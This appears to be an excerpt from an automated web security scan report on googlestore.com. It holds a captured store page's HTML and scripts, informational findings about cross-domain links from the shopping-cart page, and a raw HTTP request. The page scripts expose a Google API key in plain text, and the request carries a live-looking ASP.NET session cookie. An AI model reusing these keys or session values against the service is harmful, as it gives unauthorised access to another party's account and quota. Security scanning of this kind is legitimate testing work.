<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNjU2NjA3MTQwD2QWFGYPZBYCAgEPFgIeCWlubmVyaHRtbAXfATxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4Pyc+QmVzdCBNYXRjaDwvYT48YnIvPjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P3RvcHNlbGxlcj15ZXMmcmFua0J5PXByaWNlOmFzY2VuZGluZyc+UHJpY2UgKCQtJCQkKTwvYT48YnIvPjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P3RvcHNlbGxlcj15ZXMmcmFua0J5PXByaWNlOmRlc2NlbmRpbmcnPlByaWNlICgkJCQtJCk8L2E+PGJyLz5kAgEPZBYCAgEPFgIfAAWPAzxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P3RvcHNlbGxlcj15ZXMmY2F0ZWdvcnk9VG9wc2VsbGVycyc+VG9wc2VsbGVycygxMCk8L2E+PGJyLz48YSBocmVmPSdnb29nbGVzZWFyY2guYXNweD90b3BzZWxsZXI9eWVzJmNhdGVnb3J5PVdlYXJhYmxlcyc+V2VhcmFibGVzKDcpPC9hPjxici8+PGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg/dG9wc2VsbGVyPXllcyZjYXRlZ29yeT1FY28nPkVjbyg1KTwvYT48YnIvPjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P3RvcHNlbGxlcj15ZXMmY2F0ZWdvcnk9T2ZmaWNlJz5PZmZpY2UoMik8L2E+PGJyLz48YSBocmVmPSdnb29nbGVzZWFyY2guYXNweD90b3BzZWxsZXI9eWVzJmNhdGVnb3J5PUFjY2Vzc29yaWVzJz5BY2Nlc3NvcmllcygxKTwvYT48YnIvPmQCAg9kFgICAQ8WAh8ABf4CPGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg/dG9wc2VsbGVyPXllcyZzaXplPTJYbCc+MlhsKDcpPC9hPjxici8+PGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg/dG9wc2VsbGVyPXllcyZzaXplPU0nPk0oNyk8L2E+PGJyLz48YSBocmVmPSdnb29nbGVzZWFyY2guYXNweD90b3BzZWxsZXI9eWVzJnNpemU9WGwnPlhsKDcpPC9hPjxici8+PGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg/dG9wc2VsbGVyPXllcyZzaXplPUwnPkwoNik8L2E+PGJyLz48YSBocmVmPSdnb29nbGVzZWFyY2guYXNweD90b3BzZWxsZXI9eWVzJnNpemU9Uyc+Uyg2KTwvYT48YnIvPjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P3RvcHNlbGxlcj15ZXMmc2l6ZT0zWGwnPjNYbCgzKTwvYT48YnIvPmQCAw9kFgICAQ8WAh8ABZUEPGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg/dG9wc2VsbGVyPXllcyZjb2xvcj1CbGFjayc+QmxhY2soNCk8L2E+PGJyLz48YSBocmVmPSdnb29nbGVzZWFyY2guYXNweD90b3BzZWxsZXI9eWVzJmNvbG9yPVJlZCc+UmVkKDIpPC9hPjxici8+PGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg/dG9wc2VsbGVyPXllcyZjb2xvcj1XaGl0ZSc+V2hpdGUoMik8L2E+PGJyLz48YSBocmVmPSdnb29nbGVzZWFyY2guYXNweD90b3BzZWxsZXI9eWVzJmNvbG9yPUJsdWUnPkJsdWUoMSk8L2E+PGJyLz48YSBocmVmPSdnb29nbGVzZWFyY2guYXNweD90b3BzZWxsZXI9eWVzJmNvbG9yPUJsdWUsIEdyZWVuLCBSZWQgQW5kIFllbGxvdyc+Qmx1ZSwgR3JlZW4sIFJlZCBBbmQgWWVsbG93KDEpPC9hPjxici8+PGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg/dG9wc2VsbGVyPXllcyZjb2xvcj1HcmVlbic+R3JlZW4oMSk8L2E+PGJyLz48YSBocmVmPSdnb29nbGVzZWFyY2guYXNweD90b3BzZWxsZXI9eWVzJmNvbG9yPU5hdnknPk5hdnkoMSk8L2E+PGJyLz5kAgQPFgIfAAVJJm5ic3A7PGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg/dG9wc2VsbGVyPXllcyZzdGFydC1pbmRleD0xJz4xPC9hPiZuYnNwO2QCBQ8WAh8ABSQ8YSBocmVmPSdnb29nbGVzZWFyY2guYXNweCc+SG9tZTwvYT5kAgYPFgIfAGVkAggPFgIfAAXQMDx0YWJsZSAgYm9yZGVyPScwJyBjZWxscGFkZGluZz0nMTAnIGNlbGxzcGFjaW5nPScxNScgY2xhc3M9J3Byb2R1Y3RUYWJsZSc+PHRyPjx0ZCB3aWR0aD0nMzAlJyBzdHlsZT0ncGFkZGluZzo1cHggMHB4Oyc+PGRpdiBzdHlsZT0ncG9zaXRpb246cmVsYXRpdmU7IHdpZHRoOjk5JTsnPjxpbWcgY2xhc3M9J2Vjb3RhZ3MnIHN0eWxlPSdmbG9hdDpsZWZ0Oycgc3JjPScvaW1hZ2VzL2dyZWVuaW5pdGlhdGl2ZS9vcmdhbmljX3MuanBnJyB0aXRsZT0nTWFkZSBmcm9tIG1hdGVyaWFscyBncm93biB3aXRob3V0IHRoZSB1c2Ugb2YgaGFybWZ1bCBzeW50aGV0aWMgY2hlbWljYWxzLic+PHVsIGNsYXNzPSdzdWJjYXRJdGVtJz48bGkgY2xhc3M9J3Byb2R1Y3RJbWFnZSc+PGEgaHJlZj0nL1dlYXJhYmxlcy9PcmdhbmljK0JsYWNrK2lzK0JhY2srVC1TaGlydC5heGQnPjxpbWcgc3JjPSdodHRwOi8vd3d3Lmdvb2dsZXN0b3JlLmNvbS9jb250ZW50L2ltYWdlcy90aHVtYi9nbzEzMDUyYi5qcGcnIHdpZHRoPScxMDAnIGhlaWdodD0nMTAwJyBhbHQ9J09yZ2FuaWMgQmxhY2sgaXMgQmFjayBULVNoaXJ0IHRpdGxlPSdPcmdhbmljIEJsYWNrIGlzIEJhY2sgVC1TaGlydCcgYm9yZGVyPScwJyAvPjwvYT48L2xpPjxsaSBjbGFzcz0ncHJvZHVjdE5hbWUnPjxhIGhyZWY9Jy9XZWFyYWJsZXMvT3JnYW5pYytCbGFjaytpcytCYWNrK1QtU2hpcnQuYXhkJz5PcmdhbmljIEJsYWNrIGlzIEJhY2sgVC1TaGlydDwvYT48L2xpPjxsaSBjbGFzcz0ncHJpY2VMaXN0Jz48cCBjbGFzcz0ncHJpY2UnPiQxNy4yMDwvcD48L2xpPjwvdWw+PC9kaXY+PC90ZD48dGQgd2lkdGg9JzMwJScgc3R5bGU9J3BhZGRpbmc6NXB4IDBweDsnPjxkaXYgc3R5bGU9J3Bvc2l0aW9uOnJlbGF0aXZlOyB3aWR0aDo5OSU7Jz48aW1nIGNsYXNzPSdlY290YWdzJyBzdHlsZT0nZmxvYXQ6bGVmdDsnIHNyYz0nL2ltYWdlcy9ncmVlbmluaXRpYXRpdmUvb3JnYW5pY19zLmpwZycgdGl0bGU9J01hZGUgZnJvbSBtYXRlcmlhbHMgZ3Jvd24gd2l0aG91dCB0aGUgdXNlIG9mIGhhcm1mdWwgc3ludGhldGljIGNoZW1pY2Fscy4nPjx1bCBjbGFzcz0nc3ViY2F0SXRlbSc+PGxpIGNsYXNzPSdwcm9kdWN0SW1hZ2UnPjxhIGhyZWY9Jy9XZWFyYWJsZXMvQW5kcm9pZCtTa2F0ZWJvYXJkZXIrVC1TaGlydC5heGQnPjxpbWcgc3JjPSdodHRwOi8vd3d3Lmdvb2dsZXN0b3JlLmNvbS9jb250ZW50L2ltYWdlcy90aHVtYi8xMC0xMzA2M2IuanBnJyB3aWR0aD0nMTAwJyBoZWlnaHQ9JzEwMCcgYWx0PSdBbmRyb2lkIFNrYXRlYm9hcmRlciBULVNoaXJ0IHRpdGxlPSdBbmRyb2lkIFNrYXRlYm9hcmRlciBULVNoaXJ0JyBib3JkZXI9JzAnIC8+PC9hPjwvbGk+PGxpIGNsYXNzPSdwcm9kdWN0TmFtZSc+PGEgaHJlZj0nL1dlYXJhYmxlcy9BbmRyb2lkK1NrYXRlYm9hcmRlcitULVNoaXJ0LmF4ZCc+QW5kcm9pZCBTa2F0ZWJvYXJkZXIgVC1TaGlydDwvYT48L2xpPjxsaSBjbGFzcz0ncHJpY2VMaXN0Jz48cCBjbGFzcz0ncHJpY2UnPiQxNS44NTwvcD48L2xpPjwvdWw+PC9kaXY+PC90ZD48dGQgd2lkdGg9JzMwJScgc3R5bGU9J3BhZGRpbmc6NXB4IDBweDsnPjxkaXYgc3R5bGU9J3Bvc2l0aW9uOnJlbGF0aXZlOyB3aWR0aDo5OSU7Jz48dWwgY2xhc3M9J3N1YmNhdEl0ZW0nPjxsaSBjbGFzcz0ncHJvZHVjdEltYWdlJz48YSBocmVmPScvT2ZmaWNlL0NvbXBhY3QrSm91cm5hbC5heGQnPjxpbWcgc3JjPSdodHRwOi8vd3d3Lmdvb2dsZXN0b3JlLmNvbS9pbWFnZXMvcHJvZHVjdHMvZGlycy8xMCA1MzAxMS8xMC01MzAxMUIuanBnJyB3aWR0aD0nMTAwJyBoZWlnaHQ9JzEwMCcgYWx0PSdDb21wYWN0IEpvdXJuYWwgdGl0bGU9J0NvbXBhY3QgSm91cm5hbCcgYm9yZGVyPScwJyAvPjwvYT48L2xpPjxsaSBjbGFzcz0ncHJvZHVjdE5hbWUnPjxhIGhyZWY9Jy9PZmZpY2UvQ29tcGFjdCtKb3VybmFsLmF4ZCc+Q29tcGFjdCBKb3VybmFsPC9hPjwvbGk+PGxpIGNsYXNzPSdwcmljZUxpc3QnPjxwIGNsYXNzPSdwcmljZSc+JDEwLjYwPC9wPjwvbGk+PC91bD48L2Rpdj48L3RkPjwvdHI+PHRyPjx0ZCB3aWR0aD0nMzAlJyBzdHlsZT0ncGFkZGluZzo1cHggMHB4Oyc+PGRpdiBzdHlsZT0ncG9zaXRpb246cmVsYXRpdmU7IHdpZHRoOjk5JTsnPjx1bCBjbGFzcz0nc3ViY2F0SXRlbSc+PGxpIGNsYXNzPSdwcm9kdWN0SW1hZ2UnPjxhIGhyZWY9Jy9XZWFyYWJsZXMvTWVuK3MrQmlrZStKZXJzZXkrLStSYXN0YS5heGQnPjxpbWcgc3JjPSdodHRwOi8vd3d3Lmdvb2dsZXN0b3JlLmNvbS9jb250ZW50L2ltYWdlcy90aHVtYi8xMC0xNTAwNmIuanBnJyB3aWR0aD0nMTAwJyBoZWlnaHQ9JzEwMCcgYWx0PSdNZW4ncyBCaWtlIEplcnNleSAtIFJhc3RhIHRpdGxlPSdNZW4ncyBCaWtlIEplcnNleSAtIFJhc3RhJyBib3JkZXI9JzAnIC8+PC9hPjwvbGk+PGxpIGNsYXNzPSdwcm9kdWN0TmFtZSc+PGEgaHJlZj0nL1dlYXJhYmxlcy9NZW4rcytCaWtlK0plcnNleSstK1Jhc3RhLmF4ZCc+TWVuJ3MgQmlrZSBKZXJzZXkgLSBSYXN0YTwvYT48L2xpPjxsaSBjbGFzcz0ncHJpY2VMaXN0Jz48cCBjbGFzcz0ncHJpY2UnPiQ3Ni4xNTwvcD48L2xpPjwvdWw+PC9kaXY+PC90ZD48dGQgd2lkdGg9JzMwJScgc3R5bGU9J3BhZGRpbmc6NXB4IDBweDsnPjxkaXYgc3R5bGU9J3Bvc2l0aW9uOnJlbGF0aXZlOyB3aWR0aDo5OSU7Jz48dWwgY2xhc3M9J3N1YmNhdEl0ZW0nPjxsaSBjbGFzcz0ncHJvZHVjdEltYWdlJz48YSBocmVmPScvT2ZmaWNlL1BhY2srb2YrNCtHb29nbGUrQmFsbHBvaW50K1BlbnMuYXhkJz48aW1nIHNyYz0naHR0cDovL3d3dy5nb29nbGVzdG9yZS5jb20vY29udGVudC9pbWFnZXMvdGh1bWIvMTAtNTExMDZiLmpwZycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnIGFsdD0nUGFjayBvZiA0IEdvb2dsZSBCYWxscG9pbnQgUGVucyB0aXRsZT0nUGFjayBvZiA0IEdvb2dsZSBCYWxscG9pbnQgUGVucycgYm9yZGVyPScwJyAvPjwvYT48L2xpPjxsaSBjbGFzcz0ncHJvZHVjdE5hbWUnPjxhIGhyZWY9Jy9PZmZpY2UvUGFjaytvZis0K0dvb2dsZStCYWxscG9pbnQrUGVucy5heGQnPlBhY2sgb2YgNCBHb29nbGUgQmFsbHBvaW50IFBlbnM8L2E+PC9saT48bGkgY2xhc3M9J3ByaWNlTGlzdCc+PHAgY2xhc3M9J3ByaWNlJz4kMy44NTwvcD48L2xpPjwvdWw+PC9kaXY+PC90ZD48dGQgd2lkdGg9JzMwJScgc3R5bGU9J3BhZGRpbmc6NXB4IDBweDsnPjxkaXYgc3R5bGU9J3Bvc2l0aW9uOnJlbGF0aXZlOyB3aWR0aDo5OSU7Jz48dWwgY2xhc3M9J3N1YmNhdEl0ZW0nPjxsaSBjbGFzcz0ncHJvZHVjdEltYWdlJz48YSBocmVmPScvQWNjZXNzb3JpZXMvQ2FiYW5hK0JlYWNoK1Rvd2Vscy5heGQnPjxpbWcgc3JjPSdodHRwOi8vd3d3Lmdvb2dsZXN0b3JlLmNvbS9pbWFnZXMvcHJvZHVjdHMvZGlycy8xMCA3NTExOS8xMC03NTExOUIuanBnJyB3aWR0aD0nMTAwJyBoZWlnaHQ9JzEwMCcgYWx0PSdDYWJhbmEgQmVhY2ggVG93ZWxzIHRpdGxlPSdDYWJhbmEgQmVhY2ggVG93ZWxzJyBib3JkZXI9JzAnIC8+PC9hPjwvbGk+PGxpIGNsYXNzPSdwcm9kdWN0TmFtZSc+PGEgaHJlZj0nL0FjY2Vzc29yaWVzL0NhYmFuYStCZWFjaCtUb3dlbHMuYXhkJz5DYWJhbmEgQmVhY2ggVG93ZWxzPC9hPjwvbGk+PGxpIGNsYXNzPSdwcmljZUxpc3QnPjxwIGNsYXNzPSdwcmljZSc+JDIzLjQ1PC9wPjwvbGk+PC91bD48L2Rpdj48L3RkPjwvdHI+PHRyPjx0ZCB3aWR0aD0nMzAlJyBzdHlsZT0ncGFkZGluZzo1cHggMHB4Oyc+PGRpdiBzdHlsZT0ncG9zaXRpb246cmVsYXRpdmU7IHdpZHRoOjk5JTsnPjxpbWcgY2xhc3M9J2Vjb3RhZ3MnIHN0eWxlPSdmbG9hdDpsZWZ0Oycgc3JjPScvaW1hZ2VzL2dyZWVuaW5pdGlhdGl2ZS9vcmdhbmljX3MuanBnJyB0aXRsZT0nTWFkZSBmcm9tIG1hdGVyaWFscyBncm93biB3aXRob3V0IHRoZSB1c2Ugb2YgaGFybWZ1bCBzeW50aGV0aWMgY2hlbWljYWxzLic+PHVsIGNsYXNzPSdzdWJjYXRJdGVtJz48bGkgY2xhc3M9J3Byb2R1Y3RJbWFnZSc+PGEgaHJlZj0nL1dlYXJhYmxlcy9PcmdhbmljK0Jhc2ljK1QtU2hpcnQuYXhkJz48aW1nIHNyYz0naHR0cDovL3d3dy5nb29nbGVzdG9yZS5jb20vY29udGVudC9pbWFnZXMvdGh1bWIvZ28xMzA1M2IuanBnJyB3aWR0aD0nMTAwJyBoZWlnaHQ9JzEwMCcgYWx0PSdPcmdhbmljIEJhc2ljIFQtU2hpcnQgdGl0bGU9J09yZ2FuaWMgQmFzaWMgVC1TaGlydCcgYm9yZGVyPScwJyAvPjwvYT48L2xpPjxsaSBjbGFzcz0ncHJvZHVjdE5hbWUnPjxhIGhyZWY9Jy9XZWFyYWJsZXMvT3JnYW5pYytCYXNpYytULVNoaXJ0LmF4ZCc+T3JnYW5pYyBCYXNpYyBULVNoaXJ0PC9hPjwvbGk+PGxpIGNsYXNzPSdwcmljZUxpc3QnPjxwIGNsYXNzPSdwcmljZSc+JDE4LjI1PC9wPjwvbGk+PC91bD48L2Rpdj48L3RkPjx0ZCB3aWR0aD0nMzAlJyBzdHlsZT0ncGFkZGluZzo1cHggMHB4Oyc+PGRpdiBzdHlsZT0ncG9zaXRpb246cmVsYXRpdmU7IHdpZHRoOjk5JTsnPjx1bCBjbGFzcz0nc3ViY2F0SXRlbSc+PGxpIGNsYXNzPSdwcm9kdWN0SW1hZ2UnPjxhIGhyZWY9Jy9XZWFyYWJsZXMvTGFkaWVzK0FuZHJvaWQrSGVhcnQrVC1TaGlydC5heGQnPjxpbWcgc3JjPSdodHRwOi8vd3d3Lmdvb2dsZXN0b3JlLmNvbS9jb250ZW50L2ltYWdlcy90aHVtYi8xMC0yMzAyMmIuanBnJyB3aWR0aD0nMTAwJyBoZWlnaHQ9JzEwMCcgYWx0PSdMYWRpZXMgQW5kcm9pZCBIZWFydCBULVNoaXJ0IHRpdGxlPSdMYWRpZXMgQW5kcm9pZCBIZWFydCBULVNoaXJ0JyBib3JkZXI9JzAnIC8+PC9hPjwvbGk+PGxpIGNsYXNzPSdwcm9kdWN0TmFtZSc+PGEgaHJlZj0nL1dlYXJhYmxlcy9MYWRpZXMrQW5kcm9pZCtIZWFydCtULVNoaXJ0LmF4ZCc+TGFkaWVzIEFuZHJvaWQgSGVhcnQgVC1TaGlydDwvYT48L2xpPjxsaSBjbGFzcz0ncHJpY2VMaXN0Jz48cCBjbGFzcz0ncHJpY2UnPiQxNC42MDwvcD48L2xpPjwvdWw+PC9kaXY+PC90ZD48dGQgd2lkdGg9JzMwJScgc3R5bGU9J3BhZGRpbmc6NXB4IDBweDsnPjxkaXYgc3R5bGU9J3Bvc2l0aW9uOnJlbGF0aXZlOyB3aWR0aDo5OSU7Jz48aW1nIGNsYXNzPSdlY290YWdzJyBzdHlsZT0nZmxvYXQ6bGVmdDsnIHNyYz0nL2ltYWdlcy9ncmVlbmluaXRpYXRpdmUvb3JnYW5pY19zLmpwZycgdGl0bGU9J01hZGUgZnJvbSBtYXRlcmlhbHMgZ3Jvd24gd2l0aG91dCB0aGUgdXNlIG9mIGhhcm1mdWwgc3ludGhldGljIGNoZW1pY2Fscy4nPjx1bCBjbGFzcz0nc3ViY2F0SXRlbSc+PGxpIGNsYXNzPSdwcm9kdWN0SW1hZ2UnPjxhIGhyZWY9Jy9XZWFyYWJsZXMvT3JnYW5pYytDb3R0b24rVC1TaGlydCstK1JlZC5heGQnPjxpbWcgc3JjPSdodHRwOi8vd3d3Lmdvb2dsZXN0b3JlLmNvbS9jb250ZW50L2ltYWdlcy90aHVtYi8xMC0xMzA5MmIuanBnJyB3aWR0aD0nMTAwJyBoZWlnaHQ9JzEwMCcgYWx0PSdPcmdhbmljIENvdHRvbiBULVNoaXJ0IC0gUmVkIHRpdGxlPSdPcmdhbmljIENvdHRvbiBULVNoaXJ0IC0gUmVkJyBib3JkZXI9JzAnIC8+PC9hPjwvbGk+PGxpIGNsYXNzPSdwcm9kdWN0TmFtZSc+PGEgaHJlZj0nL1dlYXJhYmxlcy9PcmdhbmljK0NvdHRvbitULVNoaXJ0Ky0rUmVkLmF4ZCc+T3JnYW5pYyBDb3R0b24gVC1TaGlydCAtIFJlZDwvYT48L2xpPjxsaSBjbGFzcz0ncHJpY2VMaXN0Jz48cCBjbGFzcz0ncHJpY2UnPiQxMi40NTwvcD48L2xpPjwvdWw+PC9kaXY+PC90ZD48L3RyPjx0cj48dGQgd2lkdGg9JzMwJScgc3R5bGU9J3BhZGRpbmc6NXB4IDBweDsnPjxkaXYgc3R5bGU9J3Bvc2l0aW9uOnJlbGF0aXZlOyB3aWR0aDo5OSU7Jz48dWwgY2xhc3M9J3N1YmNhdEl0ZW0nPjxsaSBjbGFzcz0ncHJvZHVjdEltYWdlJz48YSBocmVmPScvV2VhcmFibGVzL01lbitzK0FrYXNoYStKYWNrZXQuYXhkJz48aW1nIHNyYz0naHR0cDovL3d3dy5nb29nbGVzdG9yZS5jb20vY29udGVudC9pbWFnZXMvdGh1bWIvMTAtMTUwMDhiLmpwZycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnIGFsdD0nTWVuJ3MgQWthc2hhIEphY2tldCB0aXRsZT0nTWVuJ3MgQWthc2hhIEphY2tldCcgYm9yZGVyPScwJyAvPjwvYT48L2xpPjxsaSBjbGFzcz0ncHJvZHVjdE5hbWUnPjxhIGhyZWY9Jy9XZWFyYWJsZXMvTWVuK3MrQWthc2hhK0phY2tldC5heGQnPk1lbidzIEFrYXNoYSBKYWNrZXQ8L2E+PC9saT48bGkgY2xhc3M9J3ByaWNlTGlzdCc+PHAgY2xhc3M9J3ByaWNlJz4kMTUyLjAwPC9wPjwvbGk+PC91bD48L2Rpdj48L3RkPjwvdGFibGU+ZAIJD2QWAgIBD2QWAgIDDw8WAh4ISW1hZ2VVcmwFFi9pbWFnZXMvYnRuX3NpZ251cC5naWZkZAILDxYCHwAF2AJodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbS9zaG9wcGluZy9zZWFyY2gvdjEvY3g6MDE2NDU4NTAxNjQ1ODg0MDU3OTEyOmRxX2l4YndodWs4L3Byb2R1Y3RzP2ZhY2V0cy5lbmFibGVkPXRydWUmY291bnRyeT11cyZtYXhSZXN1bHRzPTEyJmZhY2V0cy51c2VHY3NDb25maWc9VHJ1ZSZmYWNldHMuZGlzY292ZXI9MTAwOjEwMCZhbHQ9YXRvbSZzcGVsbGluZy5lbmFibGVkPXRydWUmcHJvbW90aW9ucy5lbmFibGVkPXRydWUmcHJvbW90aW9ucy51c2VHY3NDb25maWc9dHJ1ZSZrZXk9QUl6YVN5Q1NKTWF2NmF5Z2psVjN6dTB2bDQwamJyTWhkS2ZGY3JvJnJlc3RyaWN0Qnk9dG9wc2VsbGVyKHRleHQpOnllc2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFE2N0bFNpZ251cCRidG5TaWduVXA=" />
</div>

<div>

   <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwK2g6cqAqzh5M0OArqhlOwK" />
</div>
<input name="ctlSignup$EmailAddress" type="text" maxlength="50" id="ctlSignup_EmailAddress" class="signup-tb" />
<input type="image" name="ctlSignup$btnSignUp" id="ctlSignup_btnSignUp" src="/images/btn_signup.gif" style="border-width:0px;" />
</form>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round" >
<div class="top">
<span>
<h2 class="side_head">Store Links</h2>
</span>
</div>

<div class="center-content">
<ul class="store-links">
<li><a style="font-size:11px;" href="/shop.axd/Cart" class="shopping-cart">Shopping Cart (0)</a></li>
<li><a style="font-size:11px;" href="/shop.axd/Contact">Customer Service</a></li>
<li><a style="font-size:11px;" href="/shop.axd/Contact#warranty">Warranty / Returns</a></li>
<li><a style="font-size:11px;" href="/Mini/"><b>Google Mini</b></a></li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>
<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Categories</h2></span></div>
<div class="center-content">
<ul>
<li class="nav off"><a class="main" style="background:url(/images/category_icons/accessories_off.gif) left no-repeat;" href="googlesearch.aspx?category=accessories" >Accessories</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/fun_off.gif) left no-repeat;" href="googlesearch.aspx?category=fun" >Fun</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/kids_off.gif) left no-repeat;" href="googlesearch.aspx?category=kids" >Kids</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/office_off.gif) left no-repeat;" href="googlesearch.aspx?category=office" >Office</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/wearables_off.gif) left no-repeat;" href="googlesearch.aspx?category=wearables" >Wearables</a></li><li class="nav off"><a class="main textpopup" onclick="recordOutboundLink(this, 'Outbound Links', 'Zazzle.com LeftNav');return false;" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." style="background:url(/images/category_icons/doodles_off.gif) left no-repeat;" href=http://www.zazzle.com/googledoodles >Doodles on Demand</a>
</ul>
</div>

<div class="bottom"><span></span></div>
</div>
<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Eco Reference</h2></span></div>
<div class="center-content">
<ul class="eco_guide">
<li style="background:url(/images/greeninitiative/1.jpg) no-repeat left;">Sustainable</li>
<li style="background:url(/images/greeninitiative/2.jpg) no-repeat left;">Organic</li>
<li style="background:url(/images/greeninitiative/3.jpg) no-repeat left;">Recycled</li>
<li style="background:url(/images/greeninitiative/4.jpg) no-repeat left;">Non-Polluting</li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>
</div>

<div id="footer">


<ul id="navigation_footer_ul">
<li><a href=/Accessories/ >Accessories</a></li><li><a href=/Fun/ >Fun</a></li><li><a href=/Kids/ >Kids</a></li><li><a href=/Office/ >Office</a></li><li><a href=/Wearables/ >Wearables</a></li><li><a class="textpopup" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." onclick="target='_blank'" href=http://www.zazzle.com/googledoodles >Doodles</a></li>
<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Cart">Shopping Cart</a></li>
</ul>
<div id="legal">
Copyright Google Inc. All Rights Reserved.<br />
Use of this service constitutes your acceptance of the Google Store's <a href="/shop.axd/PrivacyPolicy">privacy policy</a>.
</div>

<script type="text/javascript" src="/js/jquery-latest.js"></script>
<script type="text/javascript" src="/js/jquery.dimensions.js"></script>
<script type="text/javascript" src="/js/jquery.tooltip.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$(".ecotags").tooltip({
   showURL: false });
   $(".textpopup").tooltip({showURL: false,effect: "bouncy" });

$("#DoodleDrop").bind("change",function(){
var imgname = $('option:selected',this).attr("id");
var edpNo = '';
if(imgname!=""){
$("#ProductImage").attr("src","/images/DOODLES/"+imgname+"_A.jpg");
}
$("#ProductImageHref").attr("href","javascript:newWindow('/view_large.aspx?img=/images/DOODLES/"+imgname+"_.jpg+&edp_no="+edpNo+"',420,600)");
});

$("#searchfilters select").bind("change",function(){
var url = $('option:selected',this).val();
if(url!=""){window.location = url;}

});

});
</script>

<script src="https://www.google.com/jsapi" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="https://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script><script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</div>
</div>

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write("<sc" + "ript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'>" + "</sc" + "ript>");

</script>

<script type="text/javascript">
var firstTracker = _gat._getTracker("UA-30481-1");
firstTracker._initData();
firstTracker._trackPageview();

var secondTracker = _gat._getTracker("UA-735212-16");
secondTracker._setLocalRemoteServerMode();
secondTracker._initData();
secondTracker._trackPageview();

</script>

<script src="http://www.google.com/jsapi" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="http://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script>
<script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</body>
</html>

3.2. http://www.googlestore.com/shoppingcart.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/shoppingcart.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.googlestore.com/shoppingcart.aspx?item_no=&cookieCheck=true

The response contains the following link to another domain:

https://checkout.google.com/view/buy?o=shoppingcart&shoppingcart=167316398544792

Request

Response

3.3. http://www.googlestore.com/shoppingcart.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/shoppingcart.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.googlestore.com/shoppingcart.aspx?item_no=&cookieCheck=true

The response contains the following links to other domains:

http://checkout.google.com/files/digital/ga_post.js
http://www.google-analytics.com/__utm.gif?label=ct_gs_exp_ns
http://www.google.com/
http://www.google.com/about.html
http://www.zazzle.com/googledoodles

Request

GET /shoppingcart.aspx?item_no=&cookieCheck=true HTTP/1.1
Host: www.googlestore.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.googlestore.com/Eco/American+Apparel+Ladies+Organic+Tee.axd
Cookie: ASP.NET_SessionId=4n1rd3u3ovrt2o45f1fvmo45; __utma=148589601.1599814706.1319223601.1319223601.1319223601.1; __utmb=148589601.30.10.1319223601; __utmc=148589601; __utmz=148589601.1319223601.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SupportCookies=true

